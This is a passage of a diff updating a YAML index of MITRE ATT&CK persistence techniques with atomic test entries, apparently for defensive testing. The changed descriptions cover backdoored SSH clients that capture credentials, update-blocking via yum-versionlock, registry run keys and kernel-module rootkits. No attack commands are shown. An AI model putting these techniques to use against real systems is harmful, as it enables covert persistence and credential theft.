         url: https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add
+      - source_name: Permiso Scattered Spider 2023
+        description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+          SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+        url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
       - source_name: Blue Cloud of Death Video
         description: 'Kunz, Bruce. (2018, October 14). Blue Cloud of Death: Red Teaming
           Azure. Retrieved November 21, 2019.'
@@ -32588,10 +33006,20 @@ persistence:
         description: 'Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming
           Azure. Retrieved October 23, 2019.'
         url: https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1
+      - source_name: Microsoft Entra ID App Passwords
+        description: Microsoft. (2023, October 23). Enforce Microsoft Entra multifactor
+          authentication with legacy applications using app passwords. Retrieved May
+          28, 2024.
+        url: https://learn.microsoft.com/en-us/entra/identity/authentication/howto-mfa-app-passwords
       - source_name: Microsoft SolarWinds Customer Guidance
         description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
           Cyber Attacks. Retrieved December 17, 2020.
         url: https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/
+      - source_name: Mandiant APT42 Operations 2024
+        description: 'Ofir Rozmann, Asli Koksal, Adrian Hernandez, Sarah Bock, and
+          Jonathan Leathery. (2024, May 1). Uncharmed: Untangling Iran''s APT42 Operations.
+          Retrieved May 28, 2024.'
+        url: https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations
       - source_name: Expel Behind the Scenes
         description: 'S. Lipton, L. Easterly, A. Randazzo and J. Hencinski. (2020,
           July 28). Behind the scenes in the Expel SOC: Alert-to-fix in AWS. Retrieved
@@ -32608,9 +33036,6 @@ persistence:
         url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.001
     atomic_tests:
     - name: Azure AD Application Hijacking - Service Principal
@@ -32757,7 +33182,7 @@ persistence:
         elevation_required: false
   T1556.008:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-05-04T18:02:51.318Z'
       name: Network Provider DLL
       description: "Adversaries may register malicious network provider dynamic link
         libraries (DLLs) to capture cleartext user credentials during the authentication
@@ -32832,7 +33257,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.003:
     technique:
@@ -32921,24 +33345,27 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.003
     atomic_tests: []
   T1554:
     technique:
-      modified: '2024-04-16T13:03:40.824Z'
+      modified: '2024-10-12T16:52:46.067Z'
       name: Compromise Host Software Binary
       description: |-
         Adversaries may modify host software binaries to establish persistent access to systems. Software binaries/executables provide a wide range of system commands or services, programs, and libraries. Common software binaries are SSH clients, FTP clients, email clients, web browsers, and many other user or server applications.
 
-        Adversaries may establish persistence though modifications to host software binaries. For example, an adversary may replace or otherwise infect a legitimate application binary (or support files) with a backdoor. Since these binaries may be routinely executed by applications or the user, the adversary can leverage this for persistent access to the host.
+        Adversaries may establish persistence though modifications to host software binaries. For example, an adversary may replace or otherwise infect a legitimate application binary (or support files) with a backdoor. Since these binaries may be routinely executed by applications or the user, the adversary can leverage this for persistent access to the host. An adversary may also modify a software binary such as an SSH client in order to persistently collect credentials during logins (i.e., [Modify Authentication Process](https://attack.mitre.org/techniques/T1556)).(Citation: Google Cloud Mandiant UNC3886 2024)
 
         An adversary may also modify an existing binary by patching in malicious functionality (e.g., IAT Hooking/Entry point patching)(Citation: Unit42 Banking Trojans Hooking 2022) prior to the binary’s legitimate execution. For example, an adversary may modify the entry point of a binary to point to malicious code patched in by the adversary before resuming normal execution flow.(Citation: ESET FontOnLake Analysis 2021)
+
+        After modifying a binary, an adversary may attempt to [Impair Defenses](https://attack.mitre.org/techniques/T1562) by preventing it from updating (e.g., via the `yum-versionlock` command or `versionlock.list` file in Linux systems that use the yum package manager).(Citation: Google Cloud Mandiant UNC3886 2024)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
       x_mitre_contributors:
       - CrowdStrike Falcon OverWatch
+      - Liran Ravich, CardinalOps
+      - Jamie Williams (U ω U), PANW Unit 42
       x_mitre_deprecated: false
       x_mitre_detection: "Collect and analyze signing certificate metadata and check
         signature validity on software that executes within the environment. Look
@@ -32952,7 +33379,7 @@ persistence:
       - Linux
       - macOS
       - Windows
-      x_mitre_version: '2.0'
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'File: File Deletion'
       - 'File: File Modification'
@@ -32967,6 +33394,11 @@ persistence:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1554
         external_id: T1554
+      - source_name: Google Cloud Mandiant UNC3886 2024
+        description: " Punsaen Boonyakarn, Shawn Chew, Logeswaran Nadarajan, Mathew
+          Potaczek, Jakub Jozwiak, and Alex Marvi. (2024, June 18). Cloaked and Covert:
+          Uncovering UNC3886 Espionage Operations. Retrieved September 24, 2024."
+        url: https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations
       - source_name: Unit42 Banking Trojans Hooking 2022
         description: 'Or Chechik. (2022, October 31). Banking Trojan Techniques: How
           Financially Motivated Malware Became Infrastructure. Retrieved September
@@ -32980,11 +33412,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:27:11.065Z'
       name: 'Event Triggered Execution: Change Default File Association'
       description: "Adversaries may establish persistence by executing malicious content
         triggered by a file type association. When a file is opened, the default program
@@ -33010,7 +33441,6 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: persistence
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Travis Smith, Tripwire
       - Stefan Kanthak
@@ -33024,7 +33454,6 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.0'
@@ -33051,8 +33480,8 @@ persistence:
         url: https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs
       - source_name: Microsoft File Handlers
         description: Microsoft. (n.d.). Specifying File Handlers for File Name Extensions.
-          Retrieved November 13, 2014.
-        url: http://msdn.microsoft.com/en-us/library/bb166549.aspx
+          Retrieved September 12, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/visualstudio/visual-studio-2015/extensibility/specifying-file-handlers-for-file-name-extensions?view=vs-2015
       - source_name: Microsoft Assoc Oct 2017
         description: Plett, C. et al.. (2017, October 15). assoc. Retrieved August
           7, 2018.
@@ -33063,7 +33492,8 @@ persistence:
         url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1546.001
     atomic_tests: []
   T1546.014:
@@ -33104,7 +33534,7 @@ persistence:
         The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path <code>/private/var/db/emondClients</code>, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at<code>/System/Library/LaunchDaemons/com.apple.emond.plist</code>.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)
 
         Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T00:16:01.732Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Event Triggered Execution: Emond'
       x_mitre_detection: Monitor emond rules creation by checking for files created
@@ -33124,12 +33554,11 @@ persistence:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.014
     atomic_tests: []
   T1574.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:37.026Z'
       name: Services File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -33183,11 +33612,10 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1547.001:
     technique:
-      modified: '2023-10-16T09:08:22.319Z'
+      modified: '2024-09-12T15:27:58.051Z'
       name: 'Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'
       description: |-
         Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -33274,9 +33702,9 @@ persistence:
           in the Registry. Retrieved August 3, 2020.
         url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry
       - source_name: Microsoft Run Key
-        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
-          12, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa376977
+        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
       - source_name: Oddvar Moe RunOnceEx Mar 2018
         description: Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden
           from Autoruns.exe. Retrieved June 29, 2018.
@@ -33289,12 +33717,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.001
     atomic_tests: []
   T1136.003:
     technique:
-      modified: '2024-03-28T16:14:28.678Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Create Account: Cloud Account'
       description: |-
         Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users)
@@ -33307,9 +33734,11 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Praetorian
       - Microsoft Threat Intelligence Center (MSTIC)
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Collect usage logs from cloud user and administrator accounts
         to identify unusual activity in the creation of new accounts and assignment
@@ -33318,13 +33747,13 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - IaaS
-      - Google Workspace
       - SaaS
-      x_mitre_version: '1.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'User Account: User Account Creation'
       type: attack-pattern
@@ -33372,9 +33801,6 @@ persistence:
         url: https://support.office.com/en-us/article/add-another-admin-f693489f-9f55-4bd0-a637-a81ce93de22d
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1136.003
     atomic_tests:
     - name: Azure AD - Create a new user
@@ -33468,7 +33894,7 @@ persistence:
         name: powershell
   T1098:
     technique:
-      modified: '2024-01-16T22:24:38.234Z'
+      modified: '2024-10-15T15:35:57.382Z'
       name: Account Manipulation
       description: "Adversaries may manipulate accounts to maintain and/or elevate
         access to victim systems. Account manipulation may consist of any action that
@@ -33504,16 +33930,15 @@ persistence:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - SaaS
       - Network
       - Containers
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
@@ -33554,7 +33979,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098
     atomic_tests:
     - name: Azure AD - adding user to Azure AD role
@@ -33793,138 +34217,137 @@ persistence:
         elevation_required: false
   T1547.006:
     technique:
-      x_mitre_platforms:
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-09-12T17:30:54.170Z'
+      name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
+      description: |-
+        Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming) 
+
+        When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
+
+        Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through <code>kextload</code> and <code>kextunload</code> commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
+
+        Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
+
+        Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
       x_mitre_contributors:
       - Wayne Silva, F-Secure Countercept
       - Anastasios Pingios
       - Jeremy Galloway
       - Red Canary
       - Eric Kaiser @ideologysec
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_deprecated: false
+      x_mitre_detection: |
+        Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: <code>modprobe</code>, <code>insmod</code>, <code>lsmod</code>, <code>rmmod</code>, or <code>modinfo</code> (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into <code>/lib/modules</code> and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
+
+        Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: <code>apt-get install linux-headers-$(uname -r)</code> On RHEL and CentOS based systems this can be accomplished by running: <code>yum install kernel-devel-$(uname -r)</code>
+
+        On macOS, monitor for execution of <code>kextload</code> commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the <code>kext_policy</code> table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, <code>/var/db/SystemPolicyConfiguration/KextPolicy</code>.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - macOS
+      - Linux
+      x_mitre_version: '1.3'
+      x_mitre_data_sources:
+      - 'Command: Command Execution'
+      - 'File: File Creation'
+      - 'File: File Modification'
+      - 'Kernel: Kernel Module Load'
+      - 'Process: Process Creation'
+      x_mitre_permissions_required:
+      - root
       type: attack-pattern
       id: attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6
       created: '2020-01-24T17:42:23.339Z'
-      x_mitre_version: '1.3'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1547.006
         url: https://attack.mitre.org/techniques/T1547/006
+        external_id: T1547.006
       - source_name: Apple Developer Configuration Profile
-        url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
         description: Apple. (2019, May 3). Configuration Profile Reference. Retrieved
           September 23, 2021.
+        url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
       - source_name: Apple Kernel Extension Deprecation
-        url: https://developer.apple.com/support/kernel-extensions/
         description: Apple. (n.d.). Deprecated Kernel Extensions and System Extension
           Alternatives. Retrieved November 4, 2020.
+        url: https://developer.apple.com/support/kernel-extensions/
       - source_name: System and kernel extensions in macOS
-        url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
         description: Apple. (n.d.). System and kernel extensions in macOS. Retrieved
           March 31, 2022.
+        url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
       - source_name: GitHub Reptile
-        url: https://github.com/f0rb1dd3n/Reptile
         description: Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved
           April 9, 2018.
+        url: https://github.com/f0rb1dd3n/Reptile
       - source_name: Volatility Phalanx2
-        url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
         description: 'Case, A. (2012, October 10). Phalanx 2 Revealed: Using Volatility
           to Analyze an Advanced Linux Rootkit. Retrieved April 9, 2018.'
+        url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
       - source_name: iDefense Rootkit Overview
-        url: http://www.megasecurity.org/papers/Rootkits.pdf
         description: Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved
-          April 6, 2018.
+          September 12, 2024.
+        url: https://www.megasecurity.org/papers/Rootkits.pdf
       - source_name: Linux Loadable Kernel Module Insert and Remove LKMs
-        url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
         description: Henderson, B. (2006, September 24). How To Insert And Remove
           LKMs. Retrieved April 9, 2018.
+        url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
       - source_name: CrowdStrike Linux Rootkit
-        url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
         description: Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit.
           Retrieved December 21, 2017.
+        url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
       - source_name: GitHub Diamorphine
-        url: https://github.com/m0nad/Diamorphine
         description: Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux
           Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018.
+        url: https://github.com/m0nad/Diamorphine
       - source_name: Securelist Ventir
-        url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
         description: 'Mikhail, K. (2014, October 16). The Ventir Trojan: assemble
           your MacOS spy. Retrieved April 6, 2018.'
+        url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
       - source_name: User Approved Kernel Extension Pike’s
-        url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
         description: Pikeralpha. (2017, August 29). User Approved Kernel Extension
           Loading…. Retrieved September 23, 2021.
+        url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
       - source_name: Linux Kernel Module Programming Guide
-        url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
         description: Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs.
           Retrieved April 6, 2018.
+        url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
       - source_name: Linux Kernel Programming
-        url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
         description: Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel
           Module Programming Guide. Retrieved April 6, 2018.
+        url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
       - source_name: Trend Micro Skidmap
-        url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
         description: Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux
           Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload.
           Retrieved June 4, 2020.
+        url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
       - source_name: Purves Kextpocalypse 2
-        url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
         description: Richard Purves. (2017, November 9). MDM and the Kextpocalypse
           . Retrieved September 23, 2021.
+        url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
       - source_name: RSAC 2015 San Francisco Patrick Wardle
-        url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
         description: Wardle, P. (2015, April). Malware Persistence on OS X Yosemite.
           Retrieved April 6, 2018.
+        url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
       - source_name: Synack Secure Kernel Extension Broken
-        url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
         description: Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel
           Extension Loading’ is Broken. Retrieved April 6, 2018.
+        url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
       - source_name: Wikipedia Loadable Kernel Module
-        url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
         description: Wikipedia. (2018, March 17). Loadable kernel module. Retrieved
           April 9, 2018.
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming) 
-
-        When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
-
-        Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through <code>kextload</code> and <code>kextunload</code> commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
-
-        Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
-
-        Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
-      x_mitre_detection: |
-        Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: <code>modprobe</code>, <code>insmod</code>, <code>lsmod</code>, <code>rmmod</code>, or <code>modinfo</code> (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into <code>/lib/modules</code> and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
-
-        Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: <code>apt-get install linux-headers-$(uname -r)</code> On RHEL and CentOS based systems this can be accomplished by running: <code>yum install kernel-devel-$(uname -r)</code>
-
-        On macOS, monitor for execution of <code>kextload</code> commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the <code>kext_policy</code> table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, <code>/var/db/SystemPolicyConfiguration/KextPolicy</code>.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: persistence
-      - kill_chain_name: mitre-attack
-        phase_name: privilege-escalation
-      x_mitre_is_subtechnique: true
-      x_mitre_data_sources:
-      - 'Command: Command Execution'
-      - 'File: File Creation'
-      - 'File: File Modification'
-      - 'Kernel: Kernel Module Load'
-      - 'Process: Process Creation'
-      x_mitre_permissions_required:
-      - root
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.006
     atomic_tests: []
   T1574.013:
@@ -33961,7 +34384,7 @@ persistence:
         url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
         description: Microsoft. (2021, November 23). NtQueryInformationProcess function
           (winternl.h). Retrieved February 4, 2022.
